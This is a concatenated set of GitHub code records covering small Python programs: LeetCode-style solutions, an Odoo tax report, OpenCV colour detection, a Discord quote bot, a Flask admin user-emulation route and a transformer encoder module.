0\n \n def countPairs(self, root: TreeNode, distance: int) -> int:\n # 返回当前结点的所有子节点高度(小于 distance)\n def dfs(node, distance):\n if not node: return [] # 节点为 null,返回空数组\n if not node.left and not node.right: return [1] # 节点为叶子节点,那么对于上一层来说,该叶子节点高度为 1\n \n # 左叶子节点高度和右叶子节点高度\n leftHeights = dfs(node.left, distance)\n rightHeights = dfs(node.right, distance)\n \n # 找到所有 左高度+右高度<=distance 的组合个数\n self.res += sum([l + r <= distance for l in leftHeights for r in rightHeights])\n \n # 对于上一层,高度要 + 1\n return [n + 1 for n in leftHeights + rightHeights if n + 1 < distance]\n \n dfs(root, distance)\n return self.res\n\n\nroot = TreeNode(1)\nroot.left = TreeNode(2)\nroot.right = TreeNode(3)\nroot.left.left = TreeNode(4)\nroot.left.right = TreeNode(5)\nroot.right.left = TreeNode(6)\nroot.right.right = TreeNode(7)\n\n\ndistance = 3\nres = Solution().countPairs(root, 
distance)\nprint(res)\n","repo_name":"lonely7yk/LeetCode_py","sub_path":"LeetCode1000/LeetCode1530NumberofGoodLeafNodesPairs.py","file_name":"LeetCode1530NumberofGoodLeafNodesPairs.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"31201141869","text":"\"\"\"\nFilesystem\n==========\n\nAutomatic waveform retrieval for your local SDS archive.\n\n\"\"\"\nfrom pyvdms import waveforms2SDS\nimport os\n\n###############################################################################\n# waveforms2SDS\n# -------------\n\n# Automatically download waveforms per day and add them to the SDS archive. If\n# waveforms for a specifc station and channel already exist then these are\n# skipped. If your SDS archive contains gaps then first the status will be\n# requested. If no status information is returned and the gap length exceeds\n# the ``force_request`` threshold then the entire day will be (re-) downloaded.\n\nos.makedirs('../../data', exist_ok=True)\n\nresp = waveforms2SDS(\n station='I18*',\n channel='*',\n starttime='2020-02-02',\n endtime='2020-02-05',\n sds_root='../../data',\n threshold=60.,\n request_limit='2GB',\n # debug=True,\n)\n\nif resp.success:\n\n if resp.completed:\n\n print('Request completed.')\n\n elif resp.quota_exceeded:\n\n print(f'Quota limit exceeded. Continue from {resp.time} onwards.')\n\nelse:\n\n print(f'An error occurred during the request:\\n{resp.error}')\n","repo_name":"psmsmets/PyVDMS","sub_path":"examples/filesystem/filesystem.py","file_name":"filesystem.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"73924180650","text":"import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nif not cap.isOpened():\n cap.open()\n\n#img = cv2.imread(\"C:\\\\Users\\\\HP\\\\Desktop\\\\Aly\\\\C.jpg\", cv2.IMREAD_GRAYSCALE)\nwhile(1):\n ret, frame = cap.read()\n\n if not ret:\n print(\"Could not get frame\")\n\n hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n green_lower = np.array([50, 50, 50])\n green_upper = np.array([70, 255, 255])\n\n # green_lower = np.array([255, 40, 255])\n # green_upper = np.array([255, 255, 255])\n\n mask = cv2.inRange(hsv_frame, green_lower, green_upper)\n\n res = cv2.bitwise_and(frame, frame, mask=mask)\n\n cv2.imshow('original', frame)\n #cv2.imshow('masked', mask)\n cv2.imshow('res', res)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n\n","repo_name":"laksh-21/Image-Processing","sub_path":"Color Detection/Color detection.py","file_name":"Color detection.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"6381784299","text":"class Solution(object):\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n res = self.part(nums)\n return res\n def part(self,nums):\n if len(nums)==1:\n return nums[0]\n else:\n half = len(nums)//2\n a,b = nums[:len(nums)//2],nums[len(nums)//2:]\n res1,res2 = self.part(a),self.part(b)\n lmax = nums[half-1]\n su =nums[half-1]\n for i in range(half-2,-1,-1):\n su+=nums[i]\n lmax = max(lmax,su)\n rmax = nums[half]\n su =nums[half]\n for i in range(half+1,len(nums)):\n su+=nums[i]\n rmax = max(rmax,su)\n return max(res1,res2,rmax+lmax)\n\nsol = 
Solution()\nprint(sol.maxSubArray([1,1]))\n","repo_name":"tongbc/algorithm","sub_path":"src/justForReal/Maximum_Subarray.py","file_name":"Maximum_Subarray.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"4131421767","text":"\ndef change_of_basis(X, W):\n \"\"\"\n Projects data onto new basis W.\n\n Args:\n X (numpy array of floats) : Data matrix each column corresponding to a\n different random variable\n W (numpy array of floats) : new orthonormal basis columns correspond to\n basis vectors\n\n Returns:\n (numpy array of floats) : Data matrix expressed in new basis\n \"\"\"\n\n # Project data onto new basis described by W\n Y = X @ W\n\n return Y\n\n\n# Project data to new basis\nY = change_of_basis(X, W)\n\n# Visualize\nwith plt.xkcd():\n plot_data_new_basis(Y)","repo_name":"NeuromatchAcademy/course-content","sub_path":"tutorials/W1D4_DimensionalityReduction/solutions/W1D4_Tutorial1_Solution_80a5f41b.py","file_name":"W1D4_Tutorial1_Solution_80a5f41b.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":2510,"dataset":"github-code","pt":"55"} +{"seq_id":"17795674946","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\nimport time\nfrom io import BytesIO\nimport xlsxwriter\n\n\nclass wizard_report_tax(models.TransientModel):\n _name = 'wizard.report.tax'\n\n branch_id = fields.Many2one('res.company', string='Branch')\n date_from = fields.Date('Star Date')\n date_to = fields.Date('End Date')\n print_type = fields.Selection([('dt', 'Detail'),('sum', 'Summary')], string='Print Type', default='dt')\n output_type = fields.Selection([('pdf', 'PDF'),('xlsx', 'Excel')], string='Output Type', default='pdf', required=True)\n\n @api.multi\n def generate_report(self):\n self.ensure_one()\n data = {}\n data['ids'] = self.env.context.get('active_ids', [])\n data['model'] = self.env.context.get('active_model', 'ir.ui.menu')\n data['form'] = self.read(['date_from', 'date_to', 'branch_id', 'output_type'])[0]\n result = {}\n if data['form']:\n if data['form']['output_type'] == 'pdf':\n result = self.env.ref('ac_account_thai.wizard_report_tax').report_action(self, data=data)\n if data['form']['output_type'] == 'xlsx':\n result = self.env.ref('ac_account_thai.wizard_xlsx_tax').report_action(self, data=data)\n return result\n\n\nclass report_tax(models.AbstractModel):\n #_inherit = 'report.account.report_tax'\n _name = 'report.ac_account_thai.report_tax'\n\n @api.multi\n def get_report_values(self, docids, data=None):\n if not data.get('form'):\n raise UserError(_(\"Form content is missing, this report cannot be printed.\"))\n\n result = self.get_data(data['form'])\n data.update(result)\n return data\n\n @api.multi\n def get_data(self, data):\n branch_id = data['branch_id'][0] if data['branch_id'] else False\n\n date_from = data['date_from'] or False\n date_to = data['date_to'] or False\n\n filters = []\n if branch_id:\n filters.append(('branch_id','=',branch_id))\n if date_from:\n filters.append(('date','>=',date_from))\n if date_to:\n filters.append(('date','<=',date_to))\n\n filters.append(('state','=','open'))\n filters.append(('tax_group','=','vat'))\n filters.append(('move_id','!=',False))\n #filters.append(('type_tax_use','=','purchase'))\n #filters.append(('type_tax_use','=','sale'))\n\n docids = self.env['account.tax.line'].search(filters, order=\"type_tax_use, tax_id, date\")\n\n 
group = {}\n # [(o.id, o.company_id, o.branch_id, o.tax_id, o.type_tax_use) for o in docids]\n for obj in docids:\n key = obj.type_tax_use, obj.tax_id\n if key in group:\n group[key]['base'] += obj.base\n group[key]['amount'] += obj.amount\n group[key]['count'] += 1\n else:\n group[key] = {\n 'tax_id': obj.tax_id ,\n 'base': obj.base ,\n 'amount': obj.amount ,\n 'count': 1 ,\n }\n\n lines = []\n for o in group:\n line = {\n 'group': o[0] ,\n 'tax_id': group[o]['tax_id'] ,\n 'base': group[o]['base'] ,\n 'amount': group[o]['amount'] ,\n 'count': group[o]['count'] ,\n }\n lines.append(line)\n\n\n result = {'data': data, 'docids': docids, 'lines': lines, }\n return result\n\n\nclass xlsx_tax(models.AbstractModel):\n _name = 'report.ac_account_thai.xlsx_tax'\n\n @api.multi\n def create_xlsx_report(self, docids, data):\n data = self.get_report_values(docids, data)\n file_data, workbook = self.get_workbook()\n workbook = self.generate_xlsx_report(workbook, data)\n return self.get_workbook_read(file_data, workbook)\n\n @api.multi\n def get_workbook(self):\n file_data = BytesIO()\n workbook = xlsxwriter.Workbook(file_data, self.get_workbook_options())\n return file_data, workbook\n\n @api.multi\n def get_workbook_options(self):\n result = {'in_memory': True, 'encoding':'UTF-8'}\n return result\n\n @api.multi\n def get_workbook_read(self, file_data, workbook):\n workbook.close()\n file_data.seek(0)\n return file_data.read(), 'xlsx'\n\n @api.multi\n def get_report_values(self, docids, data=None):\n data['ids'] = self.env.context.get('active_ids', [])\n data['model'] = self.env.context.get('active_model', 'ir.ui.menu')\n objs = self.env['wizard.report.tax'].browse(docids)\n data['form'] = objs.read(['date_from', 'date_to', 'branch_id', 'output_type'])[0]\n result = self.env['report.ac_account_thai.report_tax'].get_data(data['form'])\n data.update({'docids':result['docids'],'lines':result['lines'],})\n return data\n\n @api.multi\n def generate_xlsx_report(self, workbook, data):\n docids = data['docids']\n lines = data['lines']\n\n sheet = workbook.add_worksheet() # self.get_report_name()\n workbook, sheet, formats = self.env['report.ac_account_thai.report_xlsx'].get_header_xlsx(workbook, sheet)\n\n sheet.set_column('A:B', 15)\n sheet.set_column('C:D', 20)\n\n sheet.merge_range('A7:D7','Tax Report', formats['title'])\n sdate = ' From ' + time.strftime('%d/%m/%Y',time.strptime(data['form']['date_from'],'%Y-%m-%d')) if data['form']['date_from'] else ''\n edate = ' To ' + time.strftime('%d/%m/%Y',time.strptime(data['form']['date_to'],'%Y-%m-%d')) if data['form']['date_to'] else ''\n sheet.merge_range('A8:D8', sdate + edate, formats['hcenter'])\n\n row = 9\n if data['form']['branch_id']:\n sheet.merge_range('A'+str(row)+':D'+str(row), 'สาขา : ' + data['form']['branch_id'][1], formats['hleft'])\n row += 1\n\n row += 1\n sheet.merge_range('A'+str(row)+':B'+str(row), 'Sale', formats['tleft'])\n sheet.write('C'+str(row), 'Base Amount', formats['tright'])\n sheet.write('D'+str(row), 'Tax Amount', formats['tright'])\n row += 1\n for line in [line for line in lines if line.get('group') == 'sale']:\n sheet.merge_range('A'+str(row)+':B'+str(row), line.get('tax_id').name, formats['left'])\n sheet.write('C'+str(row), line.get('base'), formats['num'])\n sheet.write('D'+str(row), line.get('amount'), formats['num'])\n row += 1\n\n\n row += 1\n sheet.merge_range('A'+str(row)+':B'+str(row), 'Purchase', formats['tleft'])\n sheet.write('C'+str(row), 'Base Amount', formats['tright'])\n sheet.write('D'+str(row), 'Tax Amount', 
formats['tright'])\n row += 1\n for line in [line for line in lines if line.get('group') == 'purchase']:\n sheet.merge_range('A'+str(row)+':B'+str(row), line.get('tax_id').name, formats['left'])\n sheet.write('C'+str(row), line.get('base'), formats['num'])\n sheet.write('D'+str(row), line.get('amount'), formats['num'])\n row += 1\n\n\n\n return workbook\n\n","repo_name":"mossnana/almacom-modules","sub_path":"addons/addons-internal-11.0/ac_account_thai/wizard/account_report_tax.py","file_name":"account_report_tax.py","file_ext":"py","file_size_in_byte":7145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"42982061426","text":"from Brain.Threading import Threading\nfrom selectors import DefaultSelector, EVENT_READ\nfrom traceback import format_exc\nfrom socket import socket, AF_INET, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR\n\nimport Global\nfrom Global import get_username, get_language, reformat_lang, ET\n\nfrom Brain.Network import Network, MediaCenter, SystemCenter, NetCenter\nfrom HumanMachineInterface.InputInterface import InputInterface\nfrom HumanMachineInterface.OutputInterface import OutputInterface\nfrom libserver import Message\n\nHOST = \"127.0.0.1\" # localhost\nPORT = 65432\nsel = DefaultSelector()\n\n\ndef wait_for_request():\n while inp.is_listening():\n speech = inp.listen()\n print(speech)\n net.parse_instruction(speech)\n print(\"Stopped waiting for request.\")\n\n\ndef great_user():\n out.set_speech(root.find(\"greeting\").find(reformat_lang(lang)).find(\n \"start\").text + \" \" + user_name + \", \" + root.find(\"greeting\").find(reformat_lang(lang)).find(\"end\").text)\n\n\ndef set_server_for_external_components():\n lsock = socket(AF_INET, SOCK_STREAM)\n # Avoid bind() exception: OSError: [Errno 48] Address already in use\n lsock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n lsock.bind((HOST, PORT))\n lsock.listen()\n print(f\"Listening on {(HOST, PORT)}\")\n lsock.setblocking(False)\n sel.register(lsock, EVENT_READ, data=None)\n try:\n while True:\n events = sel.select(timeout=None)\n for key, mask in events:\n if key.data is None:\n accept_wrapper(key.fileobj)\n else:\n message = key.data\n try:\n message.process_events(mask)\n except Exception:\n print(\n f\"Main: Error: Exception for {message.addr}:\\n\"\n f\"{format_exc()}\"\n )\n message.close()\n except KeyboardInterrupt:\n print(\"Caught keyboard interrupt, exiting\")\n finally:\n sel.close()\n\n\ndef accept_wrapper(sock):\n conn, addr = sock.accept()\n print(f\"Accepted connection from {addr}\")\n conn.setblocking(False)\n message = Message(sel, conn, addr)\n sel.register(conn, EVENT_READ, data=message)\n\n\ntree = ET.parse(\"HumanMachineInterface/StandardSpeech.xml\")\nroot = tree.getroot()\nGlobal.tree = tree\nGlobal.root = root\n\nuser_name = get_username()\nprint(\"Setting up language\")\nlang = get_language() # reformat if isn't called by In/Out interface\nGlobal.lang = lang\nprint(\"Setting up input interface\")\ninp = InputInterface.get_instance(lang)\nprint(\"Setting up output interface\")\nout = OutputInterface.get_instance(lang)\nprint(\"Setting up processing centers\")\nmedia_center = MediaCenter.get_instance(inp, out)\nsystem_center = SystemCenter.get_instance(inp)\nnet_center = NetCenter.get_instance()\n\nprint(\"Setting up central network\")\nnet = Network.get_instance(reformat_lang(lang), media_center, system_center, net_center)\n\nprint(\"Setting up server for external 
components\")\nThreading.start_thread(name=\"set_server_thread_@alice\",\n target=set_server_for_external_components,\n daemon=True)\n# Great user\nprint(\"We are all set\")\ngreat_user()\n\nThreading.start_thread(name=\"wait_for_request_thread\",\n target=wait_for_request)\n\nout.show()\n\n# Executed when out is closed\n# As it is the main process, all the other threads will exit too as they are daemons.\n# However, the process that listens for new requests is not a daemon. It must be explicitly stopped.\n# If all threads are not stopped, the program will continue to run in the background even if the main\n# process (the Tk window) has exited.\ninp.stop_listening()\n","repo_name":"Axel-NCHO/SU_Assistant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"23705588681","text":"import discord\r\nimport random\r\nfrom discord.ext import commands\r\n\r\nclass CenturionQuotes(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n # Define a list of quotes with their corresponding authors and images\r\n self.quotes = [\r\n {\r\n \"text\": \"I bloody love a good smoothie. It's all the pleasure of eating without the hassle of chewing.\",\r\n \"author\": \"Grumio\",\r\n \"image\": \"https://i.imgur.com/tu6SR5r.png\"\r\n },\r\n {\r\n \"text\": \"It's your tunic, so technically, I'm pissing yourself.\",\r\n \"author\": \"Marcus Phillipus Valerius Gallo\",\r\n \"image\": \"https://i.imgur.com/yPEvKtl.png\"\r\n },\r\n {\r\n \"text\": \"It's Water Man.\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n },\r\n {\r\n \"text\": \"No that's a threesome, two guys can't be a gang can they.\",\r\n \"author\": \"Stylax Rufus Eurisces\",\r\n \"image\": \"https://i.imgur.com/wP7mddn.png\"\r\n },\r\n {\r\n \"text\": \"I saw you earlier, with the.. hairy stick.\",\r\n \"author\": \"Grumio\",\r\n \"image\": \"https://i.imgur.com/tu6SR5r.png\"\r\n },\r\n {\r\n \"text\": \"Do you think it's possible I give herpes to a cat?\",\r\n \"author\": \"Stylax Rufus Eurisces\",\r\n \"image\": \"https://i.imgur.com/wP7mddn.png\"\r\n },\r\n {\r\n \"text\": \"Flavia! Flavia! There's a fucking hand in the jug!\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n },\r\n {\r\n \"text\": \"You're knobbing your cousin, because it's the closest you can get to having sex with yourself.\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n },\r\n {\r\n \"text\": \"Dirty dirty dirty dick, you've got a dirty dick. Urghhhh cousin fucker\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n },\r\n {\r\n \"text\": \"His penis could have eaten my penis for breakfast.\",\r\n \"author\": \"Marcus Phillipus Valerius Gallo\",\r\n \"image\": \"https://i.imgur.com/yPEvKtl.png\"\r\n }, \r\n {\r\n \"text\": \"No actually, on their knees worshipping my rack.\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n }, \r\n {\r\n \"text\": \"I DO NOT HAVE BOOBS!\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n }, \r\n {\r\n \"text\": \"Will you come in with me? 
Incase the doctor tries to finger me.\",\r\n \"author\": \"Stylax Rufus Eurisces\",\r\n \"image\": \"https://i.imgur.com/wP7mddn.png\"\r\n }, \r\n {\r\n \"text\": \"My name is Stylax, I'm into weird sex, I shag my granny, in her fanny, I kiss my brother, I fuck my mother, and all my uncles 🎵🎵.\",\r\n \"author\": \"Aurelius aka. Water Man*\",\r\n \"image\": \"https://i.imgur.com/UwU6t7Q.png\"\r\n } \r\n ]\r\n\r\n @commands.command(name=\"quote\")\r\n async def quote(self, ctx):\r\n # Pick a random quote from the list\r\n quote = random.choice(self.quotes)\r\n\r\n # Create an embed with the quote text and author\r\n embed = discord.Embed(title=\"Random Quote\", description=quote[\"text\"], color=0xe91234)\r\n embed.set_footer(text=f\"- {quote['author']}\")\r\n \r\n\r\n # Set the thumbnail to the image of the author\r\n embed.set_thumbnail(url=quote[\"image\"])\r\n\r\n # Send the embed as a message\r\n message = f\"{ctx.author.mention} here's your quote! <:quote:1076922518193053746>\"\r\n await ctx.send(message)\r\n await ctx.send(embed=embed)\r\n await ctx.message.delete()\r\n\r\ndef setup(bot):\r\n bot.add_cog(CenturionQuotes(bot))\r\n","repo_name":"thejopu/Centurion","sub_path":"CenturionQuotes.py","file_name":"CenturionQuotes.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"2552612284","text":"class Solution:\n def numRescueBoats(self, people: List[int], limit: int) -> int:\n people.sort()\n boat = 0\n l, r = 0, len(people) - 1\n while l <= r:\n remain = limit - people[r]\n r -= 1\n boat += 1\n if remain >= people[l]:\n l += 1\n return boat\n ","repo_name":"shivamkchoudhary/LeetCode","sub_path":"0881-boats-to-save-people/0881-boats-to-save-people.py","file_name":"0881-boats-to-save-people.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"55"} +{"seq_id":"70176146092","text":"# goldbach partition\r\nimport sys\r\n\r\nsosu = []\r\ncheck = [0] * 1000001\r\ncheck[0] = 1\r\ncheck[1] = 1\r\n\r\nfor i in range(2, 1000001):\r\n if check[i] == 0:\r\n sosu.append(i)\r\n for j in range(2*i, 1000001, i):\r\n check[j] = 1\r\n\r\nt = int(sys.stdin.readline())\r\n\r\nfor _ in range(t):\r\n cnt = 0\r\n n = int(sys.stdin.readline())\r\n for i in sosu:\r\n if i >= n:\r\n break\r\n if not check[n - i] and i <= n-i: # 순서만 다른거 counting 하지 않기 위해\r\n cnt += 1\r\n print(cnt)\r\n","repo_name":"dayhang/Baekjoon","sub_path":"백준/Silver/17103. 
골드바흐 파티션/골드바흐 파티션.py","file_name":"골드바흐 파티션.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"19670389743","text":"#-*- coding:utf-8 -*-\r\nfrom application import app\r\n#\r\nfrom application import db\r\n#\r\nfrom flask import render_template, redirect, url_for, session, request, flash\r\nfrom application.models.schema import *\r\nfrom application.models.player_manager import *\r\nfrom datetime import datetime, timedelta\r\nimport logging\r\n\r\n@app.route('/find',methods=['GET','POST'])\r\ndef find():\r\n\tif request.method=='POST':\r\n\t\ttext=request.form['text']\r\n\t\tusers=find_user(text)\r\n\t\treturn render_template('user_list.html',users=users)\r\n\telse:\r\n\t\treturn render_template('emulate.html')\r\n\r\n@app.route('/emulate/')\r\ndef emulate(user_pk):\r\n\tif session['role']==\"Admin\":\r\n\t\tsession['original_session_pk']=session['user_pk']\r\n\t\tnew_user=Player.query.get(user_pk)\r\n\t\tsession['email']=new_user.email\r\n\t\tsession['username']=new_user.player_name\r\n\t\tsession['user_pk']=new_user.pk\r\n\t\tsession['role']=new_user.role\r\n\t\tsession['team_pk']=new_user.team_pk\r\n\t\tsession['logged_in'] = True\r\n\t\t# logging.debug('바뀌기전')\r\n\t\t# logging.debug(session['original_session_pk'])\r\n\t\t# logging.debug('바뀐후')\r\n\t\t# logging.debug(session['user_pk'])\r\n\t\treturn redirect(url_for('find'))\r\n\telse:\r\n\t\terror=u\"권한이 없습니다.\"\r\n\t\t# logging.debug(session['user_pk'])\r\n\t\treturn render_template('emulate.html',error=error)\t\t\r\n\r\n@app.route('/back_to_original_session')\r\ndef back_to_original_session():\r\n\toriginal=Player.query.get(session['original_session_pk'])\r\n\tsession['email']=original.email\r\n\tsession['username']=original.player_name\r\n\tsession['user_pk']=original.pk\r\n\tsession['role']=original.role\r\n\tsession['team_pk']=original.team_pk\r\n\tsession['logged_in'] = True\r\n\t# logging.debug(session['user_pk'])\r\n\treturn redirect(url_for('find'))","repo_name":"gpfl7846/homepage","sub_path":"application/controllers/emulate.py","file_name":"emulate.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"20913699552","text":"# You are given the integer N and array with 1 and 0 you should find the smalest amount of hops from starting 0 to last 0\n# considered that can move 2 or 1 places in a row and cannot get into position of num 1.\n\nn = int(input())\narr = \"\".join(input().split(\" \"))\ndef clouds(arr):\n hops = 0\n # arr = \"Hello World\"\n while arr:\n try:\n if arr[2] == \"0\":\n hops += 1\n arr = arr[2:] # pretty much the same as previous only here done with a string slicing\n elif arr[1] == \"0\":\n hops += 1\n arr = arr[1:]\n except IndexError:\n if len(arr) > 1:\n if arr[1] == \"0\": # We need to check here again for arr[1]\n hops += 1\n arr = arr[1:]\n continue\n else:\n break\n return hops\n\nprint(clouds(arr))","repo_name":"MarkoShiva/HackerRank","sub_path":"HackerRank/InterviewPreparation/clouds.py","file_name":"clouds.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"74798396972","text":"##Note: Website has a firmware for web scraping, so this did not work\n\nfrom requests_html import HTMLSession\n\nsession = HTMLSession()\n\nheaders = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36'\n}\n\nurl = \"https://usa.ingrammicro.com/Site/home\"\n\nr = session.get(url, headers=headers, payload= {'sessionid':'h-b69e670022969d927cd560740fc0b7a7_t-1638310868'} )\n\nr.html.render(sleep=1, keep_page=True, scrolldown=1)\n\nprint(r.html.html)","repo_name":"Alperencode/BeautifulSoup","sub_path":"UpWork11/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"18349984288","text":"#!/usr/bin/python3\n'''\nA function for grid island_perimeter\n'''\n\n\ndef island_perimeter(grid):\n '''\n Returns perimeter of the island described in a grid\n\n The grid represents water by 0 and land by 1.\n\n Args:\n grid (list): A list of lists of integers\n '''\n grid_width = len(grid[0])\n grid_height = len(grid)\n edges = 0\n perimeter = 0\n\n for i in range(grid_height):\n for j in range(grid_width):\n if grid[i][j] == 1:\n perimeter += 1\n if (j > 0 and grid[i][j - 1] == 1):\n edges += 1\n if (i > 0 and grid[i - 1][j] == 1):\n edges += 1\n return perimeter * 4 - edges * 2\n","repo_name":"itsoluwatobby/alx-low_level_programming","sub_path":"0x1C-makefiles/5-island_perimeter.py","file_name":"5-island_perimeter.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"2620696305","text":"from typing import List\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def level_order(self, root: TreeNode) -> List[List[int]]:\n if root is None:\n return []\n result = []\n queue = [[root]]\n while queue:\n nodes = queue.pop(0)\n parcial = []\n level = []\n for node in nodes:\n level.append(node.val)\n if node.left is not None:\n parcial.append(node.left)\n if node.right is not None:\n parcial.append(node.right)\n result.append(level)\n if parcial:\n queue.append(parcial)\n return result\n","repo_name":"joaojunior/hackerrank","sub_path":"leetcode/binary-tree-level-order-traversal/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"13340911077","text":"import math\nimport torch\nimport torch.nn as nn\n\nfrom videoanalyst.model.utils.transformer_layers import (SpatialPositionEncodingLearned,\n MultiHeadAttention,\n PositionWiseFeedForward)\n\n\nclass EncoderLayer(nn.Module):\n ''' Compose with two layers '''\n\n def __init__(self, d_model, d_inner, n_head, d_k, d_v, dropout=0.1):\n super(EncoderLayer, self).__init__()\n self.slf_attn = nn.MultiheadAttention(embed_dim=d_model, num_heads=n_head, dropout=dropout)\n self.norm = nn.LayerNorm(d_model, eps=1e-6)\n self.pos_ffn = PositionWiseFeedForward(d_model, d_inner, dropout=dropout)\n\n def forward(self, enc_input, mask=None):\n enc_output, enc_slf_attn = self.slf_attn(query=enc_input, key=enc_input, value=enc_input,\n attn_mask=mask)\n enc_output = enc_input + enc_output\n enc_output = self.norm(enc_output)\n\n enc_output = self.pos_ffn(enc_output)\n return enc_output, enc_slf_attn\n\n\nclass Encoder(nn.Module):\n def __init__(self,\n mid_channels_model=256,\n mid_channels_ffn=2048,\n num_heads=8,\n num_layers=8,\n prob_dropout=0.0,\n score_size=33):\n super(Encoder, self).__init__()\n assert mid_channels_model % num_heads == 0\n mid_channels_k = mid_channels_model // 
num_heads\n mid_channels_v = mid_channels_k\n\n self.spatial_position_encoding = SpatialPositionEncodingLearned(mid_channels_model, score_size)\n # self.dropout = nn.Dropout(p=prob_dropout)\n # self.layer_norm = nn.LayerNorm(mid_channels_model, eps=1e-6)\n self.encoder_layers = nn.ModuleList([\n EncoderLayer(mid_channels_model, mid_channels_ffn, num_heads,\n mid_channels_k, mid_channels_v, dropout=prob_dropout)\n for _ in range(num_layers)])\n\n def forward(self, x):\n # B, C, H, W = x.shape\n x = self.spatial_position_encoding(x)\n\n x = x.view(*x.shape[:2], -1) # B, C, HW\n enc_output = x.permute(2, 0, 1).contiguous() # HW, B, C\n\n # no need of mask if enc_output.shape is (BT, HW, C)\n for enc_layer in self.encoder_layers:\n enc_output, enc_slf_attn = enc_layer(enc_output)\n return enc_output # HW, B, C\n","repo_name":"fzh0917/SparseTT","sub_path":"videoanalyst/model/neck/neck_impl/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"55"} +{"seq_id":"32365739775","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 18 14:35:57 2023\n\n@author: JK-WORK\n\"\"\"\n\nimport os, shutil,sys\nimport subprocess\n\nimport sys, os\npath_to_whatprot_python=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))+ '/ext/whatprot/python';\nsys.path.append(path_to_whatprot_python)\nfrom cleave_proteins import cleave_proteins\nfrom dye_seqs_from_peptides import dye_seqs_from_peptides\n\n\ndef erase_contents(folder): #Erase contents of folder\n for filename in os.listdir(folder): ## https://stackoverflow.com/questions/185936/how-to-delete-the-contents-of-a-folder\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print('Failed to delete %s. 
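The Encoder above flattens the B x C x H x W score map into sequence-first tokens before self-attention. A self-contained check of that (HW, B, C) layout, with sizes matching the snippet's defaults (score_size=33, mid_channels_model=256, num_heads=8; the batch size is illustrative):

import torch
import torch.nn as nn

# nn.MultiheadAttention defaults to sequence-first tensors, so a 33x33
# score map flattened to HW=1089 tokens feeds in directly.
attn = nn.MultiheadAttention(embed_dim=256, num_heads=8)
tokens = torch.randn(33 * 33, 2, 256)        # (HW, B, C)
out, weights = attn(tokens, tokens, tokens)  # self-attention
print(out.shape)                             # torch.Size([1089, 2, 256])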
